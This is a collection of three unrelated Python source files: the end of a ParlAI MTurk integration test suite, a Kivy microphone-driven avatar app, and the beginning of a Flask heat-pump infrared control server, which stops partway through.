if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_2, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_3, task_group_id)
def msg_callback_3(packet):
nonlocal last_command_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_3 = packet
test_agent_4 = MockAgent(opt, hit_id, assign_id_4,
worker_id_4, task_group_id)
def msg_callback_4(packet):
nonlocal last_command_4
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command_4 = packet
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
message_handler_4 = \
make_packet_handler(test_agent_4, dummy, dummy, msg_callback_4)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_4.setup_socket(server_url, message_handler_4)
test_agent_1.wait_for_alive()
test_agent_2.wait_for_alive()
test_agent_3.wait_for_alive()
test_agent_4.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
check_new_agent_setup(test_agent_2, mturk_manager)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_new_agent_setup(test_agent_3, mturk_manager)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_3].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
check_new_agent_setup(test_agent_4, mturk_manager)
mturk_manager_assign_4 = \
mturk_manager.mturk_workers[worker_id_4].agents[assign_id_4]
assign_state_4 = mturk_manager_assign_4.state
# Start heartbeats
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
test_agent_4.always_beat = True
test_agent_4.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Run agent_1 through onboarding
assert test_agent_1.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_1.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_ONBOARDING)
test_agent_1.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Run agent_2 through onboarding
assert test_agent_2.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_2.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_ONBOARDING)
test_agent_2.send_message('Onboard2', dummy)
wait_for_state_time(3, mturk_manager)
# Ensure both agents are in a task world
assert test_agent_1.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_IN_TASK)
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
# Run agent_3 through onboarding
assert test_agent_3.conversation_id.startswith('o_'), \
'Mock agent didn\'t make it to onboarding'
test_agent_3.send_message('Onboard1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_3.status, AssignState.STATUS_ONBOARDING)
test_agent_3.send_message('Onboard2', dummy)
wait_for_state_time(2, mturk_manager)
# Ensure agent 3 is sitting in a waiting world now
assert test_agent_3.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_3.status, AssignState.STATUS_WAITING)
wait_for_state_time(2, mturk_manager)
first_agent = None
second_agent = None
assert test_agent_1.wants_to_send or test_agent_2.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
if test_agent_1.wants_to_send:
first_agent = test_agent_1
second_agent = test_agent_2
else:
second_agent = test_agent_1
first_agent = test_agent_2
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(assign_state_1.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(5, mturk_manager)
# Assert that the two other agents were expired
check_status(assign_state_3.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_4.status, AssignState.STATUS_EXPIRED)
assert last_command_3.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Waiting world agent was not expired'
assert last_command_4.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'Onboarding world agent was not expired'
test_agent_3.always_beat = False
test_agent_4.always_beat = False
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state_1.status, AssignState.STATUS_DONE)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert mturk_manager_assign_1.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_2.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_4.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert mturk_manager_assign_3.hit_is_expired is True, \
'MTurk manager failed to mark agent as expired'
assert mturk_manager_assign_4.hit_is_expired is True, \
'MTurk manager failed to mark agent as expired'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_4), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[EXPIRE_HIT_TEST] = True
def test_allowed_conversations(opt, server_url):
"""Test to ensure that an agent can't take part in two conversations at
the same time when only one concurrent conversation is allowed, but that
they're allowed to start it after finishing the first
"""
global completed_threads
print('{} Starting'.format(ALLOWED_CONVERSATION_TEST))
opt['allowed_conversations'] = 1
opt['num_conversations'] = 2
opt['task'] = ALLOWED_CONVERSATION_TEST
hit_id = FAKE_HIT_ID.format(ALLOWED_CONVERSATION_TEST)
assign_id = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(ALLOWED_CONVERSATION_TEST, 2)
worker_id = FAKE_WORKER_ID.format(ALLOWED_CONVERSATION_TEST, 1)
last_command = None
message_num = 0
expected_messages = [
TestSoloWorld.TEST_TEXT_1, TestSoloWorld.TEST_TEXT_2
]
mturk_agent_id = AGENT_1_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_solo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# Create an agent and set it up to connect
def msg_callback(packet):
nonlocal last_command
nonlocal message_num
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
last_command = packet
else:
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
test_agent = MockAgent(opt, hit_id, assign_id, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent, dummy, dummy, msg_callback)
test_agent.setup_socket(server_url, message_handler)
test_agent.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign = \
mturk_manager.mturk_workers[worker_id].agents[assign_id]
assign_state = mturk_manager_assign.state
test_agent.always_beat = True
test_agent.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_IN_TASK)
assert len(assign_state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state.messages))
# Try to connect to second conversation
test_agent_2 = \
MockAgent(opt, hit_id, assign_id_2, worker_id, task_group_id)
message_handler = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback)
test_agent_2.setup_socket(server_url, message_handler)
test_agent_2.wait_for_alive()
wait_for_state_time(2, mturk_manager)
assert last_command.data['text'] == data_model.COMMAND_EXPIRE_HIT, \
'HIT was not immediately expired when connected'
# Finish first conversation
test_agent.send_message('Hello2', dummy)
test_agent.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
# Retry second conversation
last_command = None
message_num = 0
test_agent_2.send_alive()
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_2, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Run through task
assert test_agent_2.conversation_id.startswith('t_'), \
'Mock agent didn\'t make it to task world'
assert last_command.data['text'] == data_model.COMMAND_SEND_MESSAGE, \
'Agent was not asked to send message {}'.format(message_num)
test_agent_2.send_message('Hello1', dummy)
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_IN_TASK)
assert len(assign_state_2.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
test_agent_2.send_message('Hello2', dummy)
test_agent_2.always_beat = False
wait_for_state_time(2, mturk_manager)
check_status(assign_state_2.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(assign_state.status, AssignState.STATUS_DONE)
assert len(assign_state.messages) == 0, \
'Messages were not cleared upon completion of the task'
assert mturk_manager_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert message_num == 2, 'Not all messages were successfully processed'
completed_threads[ALLOWED_CONVERSATION_TEST] = True
def test_unique_workers_in_conversation(opt, server_url):
"""Ensures that a worker cannot start a conversation with themselves
when not in the sandbox
"""
global completed_threads
print('{} Starting'.format(UNIQUE_CONVERSATION_TEST))
opt['task'] = UNIQUE_CONVERSATION_TEST
opt['is_sandbox'] = False
opt['count_complete'] = True
hit_id = FAKE_HIT_ID.format(UNIQUE_CONVERSATION_TEST)
worker_id_1 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 1)
worker_id_2 = FAKE_WORKER_ID.format(UNIQUE_CONVERSATION_TEST, 2)
assign_id_1 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 1)
assign_id_2 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 2)
assign_id_3 = FAKE_ASSIGNMENT_ID.format(UNIQUE_CONVERSATION_TEST, 3)
connection_id_1 = '{}_{}'.format(worker_id_1, assign_id_1)
connection_id_2 = '{}_{}'.format(worker_id_1, assign_id_2)
connection_id_3 = '{}_{}'.format(worker_id_2, assign_id_3)
message_num = 0
expected_messages = [
TestDuoWorld.MESSAGE_1, TestDuoWorld.MESSAGE_2,
TestDuoWorld.MESSAGE_3, TestDuoWorld.MESSAGE_4
]
mturk_agent_id_1 = AGENT_1_ID
mturk_agent_id_2 = AGENT_2_ID
mturk_manager = MTurkManager(
opt=opt,
mturk_agent_ids=[mturk_agent_id_1, mturk_agent_id_2],
is_test=True
)
mturk_manager.server_url = server_url
mturk_manager.start_new_run()
task_group_id = mturk_manager.task_group_id
world_thread = threading.Thread(target=run_duo_world,
args=(opt, mturk_manager, False))
world_thread.daemon = True
world_thread.start()
# create and set up the two agents for the one worker
test_agent_1 = MockAgent(opt, hit_id, assign_id_1,
worker_id_1, task_group_id)
def msg_callback_1(packet):
nonlocal message_num
nonlocal test_agent_1
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_1.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_1 = \
make_packet_handler(test_agent_1, dummy, dummy, msg_callback_1)
test_agent_1.setup_socket(server_url, message_handler_1)
test_agent_1.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Assert that the state was properly set up
check_new_agent_setup(test_agent_1, mturk_manager,
AssignState.STATUS_WAITING)
mturk_manager_assign_1 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_1]
assign_state_1 = mturk_manager_assign_1.state
# Start heartbeats for 1
test_agent_1.always_beat = True
test_agent_1.send_heartbeat()
wait_for_state_time(3, mturk_manager)
# Ensure agent 1 is sitting in a waiting world now
assert test_agent_1.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
# Set up the second agent
test_agent_2 = MockAgent(opt, hit_id, assign_id_2,
worker_id_1, task_group_id)
def msg_callback_2(packet):
nonlocal message_num
nonlocal test_agent_2
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_2.wants_to_send = True
elif test_agent_2.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_2 = \
make_packet_handler(test_agent_2, dummy, dummy, msg_callback_2)
test_agent_2.setup_socket(server_url, message_handler_2)
test_agent_2.wait_for_alive()
wait_for_state_time(3, mturk_manager)
# Ensure no task has started yet
assert test_agent_2.conversation_id.startswith('w_'), \
'Mock agent didn\'t make it to waiting'
mturk_manager_assign_2 = \
mturk_manager.mturk_workers[worker_id_1].agents[assign_id_2]
assign_state_2 = mturk_manager_assign_2.state
check_status(assign_state_1.status, AssignState.STATUS_WAITING)
check_status(assign_state_2.status, AssignState.STATUS_WAITING)
# Start heartbeats for 2
test_agent_2.always_beat = True
test_agent_2.send_heartbeat()
wait_for_state_time(2, mturk_manager)
# Create third agent
test_agent_3 = MockAgent(opt, hit_id, assign_id_3,
worker_id_2, task_group_id)
def msg_callback_3(packet):
nonlocal message_num
nonlocal test_agent_3
if packet.data['type'] == data_model.MESSAGE_TYPE_COMMAND:
if packet.data['text'] == data_model.COMMAND_SEND_MESSAGE:
test_agent_3.wants_to_send = True
elif test_agent_1.conversation_id.startswith('t_'):
assert packet.data['text'] == expected_messages[message_num], \
'Expected {} for message {}, got {}'.format(
expected_messages[message_num],
message_num,
packet.data['text']
)
message_num += 1
message_handler_3 = \
make_packet_handler(test_agent_3, dummy, dummy, msg_callback_3)
test_agent_3.setup_socket(server_url, message_handler_3)
test_agent_3.wait_for_alive()
wait_for_state_time(2, mturk_manager)
# Start heartbeats for 3
test_agent_3.always_beat = True
test_agent_3.send_heartbeat()
# Assert that the state was properly set up
check_new_agent_setup(test_agent_3, mturk_manager,
AssignState.STATUS_IN_TASK)
mturk_manager_assign_3 = \
mturk_manager.mturk_workers[worker_id_2].agents[assign_id_3]
assign_state_3 = mturk_manager_assign_3.state
in_agent = None
in_assign = None
out_assign = None
if assign_state_1.status == AssignState.STATUS_IN_TASK:
in_agent = test_agent_1
in_assign = mturk_manager_assign_1
out_assign = mturk_manager_assign_2
elif assign_state_2.status == AssignState.STATUS_IN_TASK:
out_assign = mturk_manager_assign_1
in_agent = test_agent_2
in_assign = mturk_manager_assign_2
else:
assert False, 'Neither agent moved into the task world'
wait_for_state_time(4, mturk_manager)
assert in_agent.wants_to_send or test_agent_3.wants_to_send, \
'Neither agent is ready to send a message after arriving in task'
first_agent = None
second_agent = None
if in_agent.wants_to_send:
first_agent = in_agent
second_agent = test_agent_3
else:
first_agent = test_agent_3
second_agent = in_agent
# Step through the task
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
second_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
first_agent.send_message(expected_messages[message_num])
wait_for_state_time(2, mturk_manager)
assert len(in_assign.state.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_1.messages))
assert len(assign_state_3.messages) == 3, \
'Not all of the messages have been stored into the state, found {}' \
'when expecting 3'.format(len(assign_state_2.messages))
second_agent.send_message(expected_messages[message_num])
test_agent_1.always_beat = False
test_agent_2.always_beat = False
wait_for_state_time(3, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
wait_for_state_time(DISCONNECT_WAIT_TIME, mturk_manager)
check_status(in_assign.state.status, AssignState.STATUS_DONE)
check_status(out_assign.state.status, AssignState.STATUS_EXPIRED)
check_status(assign_state_3.status, AssignState.STATUS_DONE)
assert mturk_manager.completed_conversations == 1, \
'Complete conversation not marked as complete'
assert in_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.disconnected is False, \
'MTurk manager improperly marked the agent as disconnected'
assert out_assign.hit_is_expired is True, \
'Expired HIT was not marked as such'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_1), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_2), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
assert not mturk_manager.socket_manager.socket_is_open(connection_id_3), \
'The socket manager didn\'t close the socket upon completion of the ' \
'task, though it should have'
completed_threads[UNIQUE_CONVERSATION_TEST] = True
# Map of tests to run to their testing function, slowest tests first reduces
# overall runtime
TESTS = {
DUO_NO_ONBOARDING_TEST: test_duo_no_onboarding,
SOLO_ONBOARDING_TEST: test_solo_with_onboarding,
DUO_ONBOARDING_TEST: test_duo_with_onboarding,
EXPIRE_HIT_TEST: test_expire_hit,
DUO_ONE_DISCONNECT_TEST: test_duo_one_disconnect,
DUO_VALID_RECONNECT_TEST: test_duo_valid_reconnects,
UNIQUE_CONVERSATION_TEST: test_unique_workers_in_conversation,
ALLOWED_CONVERSATION_TEST: test_allowed_conversations,
SOLO_REFRESH_TEST: test_solo_refresh_in_middle,
SOLO_NO_ONBOARDING_TEST: test_solo_no_onboarding,
COUNT_COMPLETE_TEST: test_count_complete,
SOCKET_TEST: test_socket_manager,
AMAZON_SNS_TEST: test_sns_service,
}
# Runtime threads, MAX_THREADS is used on initial pass, RETEST_THREADS is used
# with flakey tests that failed under heavy load and thus may not have met
# the expected times for updating state
MAX_THREADS = 8
RETEST_THREADS = 2
def run_tests(tests_to_run, max_threads, base_opt, server_url):
global start_time
failed_tests = []
threads = {}
for test_name in tests_to_run:
while len(threads) >= max_threads:
new_threads = {}
for n in threads:
if threads[n].isAlive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
new_thread = threading.Thread(target=TESTS[test_name],
args=(base_opt.copy(), server_url))
new_thread.start()
start_times[test_name] = time.time()
threads[test_name] = new_thread
time.sleep(0.25)
while len(threads) > 0:
new_threads = {}
for n in threads:
if threads[n].isAlive():
new_threads[n] = threads[n]
else:
if n in completed_threads:
print("{} Passed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
else:
print("{} Failed. Runtime - {} Seconds".format(
n,
time.time() - start_times[n]
))
failed_tests.append(n)
threads = new_threads
time.sleep(1)
return failed_tests
def main():
start_time = time.time()
argparser = ParlaiParser(False, False)
argparser.add_parlai_data_path()
argparser.add_mturk_args()
base_opt = argparser.parse_args()
base_opt['is_sandbox'] = True
base_opt['num_conversations'] = 1
base_opt['count_complete'] = False
task_name, server_url = handle_setup(base_opt)
print("Setup time: {} seconds".format(time.time() - start_time))
start_time = time.time()
try:
failed_tests = run_tests(TESTS, MAX_THREADS, base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed: ", failed_tests)
print("Retrying flakey tests with fewer threads")
flakey_tests = {}
for test_name in failed_tests:
flakey_tests[test_name] = TESTS[test_name]
failed_tests = run_tests(flakey_tests, RETEST_THREADS,
base_opt, server_url)
if len(failed_tests) == 0:
print("All tests passed, ParlAI MTurk is functioning")
else:
print("Some tests failed even on retry: ", failed_tests)
test_duration = time.time() - start_time
print("Test duration: {} seconds".format(test_duration))
except Exception:
raise
finally:
handle_shutdown(task_name)
if __name__ == '__main__':
mturk_utils.setup_aws_credentials()
main()
|
concept.py
|
import threading
import matplotlib.figure
import time
import numpy as np
import pyaudio
from kivy.app import App
from kivy.config import Config
from kivy.clock import mainthread
from kivy.core.image import Image
from kivy.garden.matplotlib.backend_kivyagg import FigureCanvasKivyAgg
from kivy.graphics.context_instructions import Color
from kivy.graphics.vertex_instructions import Rectangle
from kivy.properties import BooleanProperty
from kivy.uix.slider import Slider
from kivy.uix.switch import Switch
from kivy.uix.widget import Widget
CHUNKSIZE = 2048
RATE = 44100
avatar = None
plot_widget = None
Config.read("concept.rc")
Config.adddefaultsection("avatar")
Config.setdefault("avatar", "volume", .5)
Config.write()
volume = Config.getfloat("avatar", "volume")
figure = matplotlib.figure.Figure()
lines = []
axs = figure.subplots(2, 1)
lines.extend(axs[0].plot(np.zeros(CHUNKSIZE)))
axs[0].set_xlim((0, CHUNKSIZE))
axs[0].set_ylim((-.2, .2))
FFT_CHUNK = 10 * CHUNKSIZE
fftfreq = np.fft.fftfreq(FFT_CHUNK, d=RATE / CHUNKSIZE / 1000000)
lines.extend(axs[1].plot(fftfreq[:FFT_CHUNK // 2], np.zeros(FFT_CHUNK // 2)))
axs[1].plot([0, FFT_CHUNK], [1, 1], "r-")
axs[1].set_ylim((0, 2))
axs[1].set_xlim((0, 3000))
plot_active = False
@mainthread
def plot(y):
lines[0].set_ydata(y)
fft = np.fft.fft(y, n=FFT_CHUNK)
fft = np.sqrt(np.abs(fft))
if plot_active:
lines[1].set_ydata(fft[:FFT_CHUNK // 2])
figure.canvas.draw()
max_freq = fftfreq[np.argmax(fft[:FFT_CHUNK // 2])]
max_freq_vol = fft[np.argmax(fft[:FFT_CHUNK // 2])]
if max_freq_vol > 1 and max_freq > 100:
avatar.mouth = "open"
else:
avatar.mouth = "closed"
class Avatar(Widget):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
global avatar
avatar = self
self._textures = {}
with self.canvas:
Color(0., 1., 0.)
self._background = Rectangle(pos=self.pos, size=(self.width, self.width))
Color(1., 1., 1.)
self._body = Rectangle(texture=self.get_texture("body"), pos=self.pos, size=(self.width, self.width))
self._eyes = Rectangle(texture=self.get_texture("eyes.open"), pos=self.pos, size=(self.width, self.width))
self._mouth = Rectangle(texture=self.get_texture("mouth.closed"), pos=self.pos, size=(self.width, self.width))
self.bind(size=self._update_rect, pos=self._update_rect)
def _update_rect(self, instance, value):
self._background.pos = instance.pos
self._background.size = instance.size
mn = min(instance.width, instance.height)
size = (mn, mn)
pos = (instance.x + (instance.width - mn) / 2, instance.y)
self._body.pos = pos
self._body.size = size
self._eyes.pos = pos
self._eyes.size = size
self._mouth.pos = pos
self._mouth.size = size
def get_texture(self, name):
if name not in self._textures:
self._textures[name] = Image("data/images/layers/{}.png".format(name)).texture
return self._textures[name]
@property
@mainthread
def eyes(self):
raise NotImplementedError()
@eyes.setter
@mainthread
def eyes(self, value):
self._eyes.texture = self.get_texture("eyes.{}".format(value))
@property
@mainthread
def mouth(self):
raise NotImplementedError()
@mouth.setter
@mainthread
def mouth(self, value):
self._mouth.texture = self.get_texture("mouth.{}".format(value))
class Plot(FigureCanvasKivyAgg):
active = BooleanProperty(False)
def __init__(self, *args, **kwargs):
super().__init__(figure, *args, **kwargs)
global plot_widget
plot_widget = self
class PlotSwitch(Switch):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.bind(active=self.on_active_change)
def on_active_change(self, instance, value):
global plot_active
plot_active = value
plot_widget.active = value
class ConceptApp(App):
pass
class VolumeSlider(Slider):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.value = volume
self.bind(value=self.on_value_change)
def on_touch_up(self, touch):
super().on_touch_up(touch)
Config.set("avatar", "volume", volume)
Config.write()
def on_value_change(self, instance, value):
global volume
volume = value
def plotter():
p = pyaudio.PyAudio()
stream = p.open(
format=pyaudio.paFloat32,
channels=1,
rate=RATE,
input=True,
output=True,
frames_per_buffer=CHUNKSIZE,
)
i = 0
while True:
data = stream.read(CHUNKSIZE)
numpydata = np.fromstring(data, dtype=np.float32)
numpydata *= volume
# fft = np.abs(np.fft.fft(numpydata, n=10*CHUNKSIZE))
# ifft = np.fft.ifft(fft)[:CHUNKSIZE]
# stream.write(ifft.astype(np.float32).tostring())
if i % 2 == 0:
plot(numpydata)
i += 1
plotter_thread = threading.Thread(target=plotter)
plotter_thread.daemon = True
plotter_thread.start()
def blinker():
while True:
time.sleep(6)
avatar.eyes = "closed"
time.sleep(.1)
avatar.eyes = "open"
blinker_thread = threading.Thread(target=blinker)
blinker_thread.daemon = True
blinker_thread.start()
ConceptApp().run()
|
server.py
|
# Copyright (c) 2017 Richard Sanger
#
# Licensed under MIT
#
# A simple flask based web interface for controlling a heatpump and receiving
# current state using IR.
#
#
# * /api/set accepts a JSON object that can be posted with the settings to change
# and 'apply' indicating this state should be sent to the heatpump. This
# returns the previous state and the new state.
# * /api/status returns the current state
#
# * Also handles IR messages received, if the remote is used to control the heat
# pump the internal state will be updated with the new state information so
# it is not overwritten the next time we send a message.
from flask import Flask, request, jsonify, abort
from heatpump import HeatPump
import sys
import os
import threading
import select
import json
import struct
try:
import urllib2
except:
import urllib.request as urllib2
try:
import cPickle as pickle
except:
import pickle
class default_config:
LIRC_PATH = "/dev/lirc0"
SAVE_STATE_PATH = None # If set save current state and load when reloaded
app = Flask(__name__)
app.config.from_object(default_config)
try:
app.config.from_envvar('SERVER_SETTINGS')
except:
pass
PULSE_BIT = 0x01000000
PULSE_MASK = 0x00FFFFFF
f = os.open(app.config['LIRC_PATH'], os.O_RDWR)
assert f > 0
def decode(values):
cur = None
try:
cur = HeatPump.decode(values)
except:
return
# Send an update back to ourself
req = urllib2.Request("http://localhost/api/update")
req.add_header('Content-Type', 'application/json')
try:
response = urllib2.urlopen(req, json.dumps({'data': cur}))
_ = json.load(response)
except:
pass
def receiver():
global f
grabbed = []
while True:
s_res = select.select([f], [], [], 0.1)
if len(s_res[0]) and s_res[0][0] == f:
# Have data
bytes = os.read(f, 4)
assert len(bytes) == 4
as_int = struct.unpack('i', bytes)[0]
as_int = as_int & PULSE_MASK
if as_int > 1000000:
continue
grabbed.append(as_int)
if len(grabbed) == 583:
decode(grabbed)
grabbed = []
else: # timeout
if len(grabbed) >= 291:
decode(grabbed)
grabbed = []
t = threading.Thread(target=receiver)
t.daemon = True
t.start()
try:
with open(app.config['SAVE_STATE_PATH'], 'rb') as fstate:
pump = pickle.load(fstate)
except:
pump = HeatPump()
def save_state():
if app.config['SAVE_STATE_PATH']:
try:
with open(app.config['SAVE_STATE_PATH'], 'wb') as fstate:
pickle.dump(pump, fstate)
except:
pass
def program_heatpump():
""" Send current state as IR message """
global f
global pump
request = pump.encode()
written = os.write(f, request)
save_state()
assert len(request) == written
@app.route('/')
def hello_world():
return 'Hello, World!'
@app.route('/api/update', methods=['POST'])
def update():
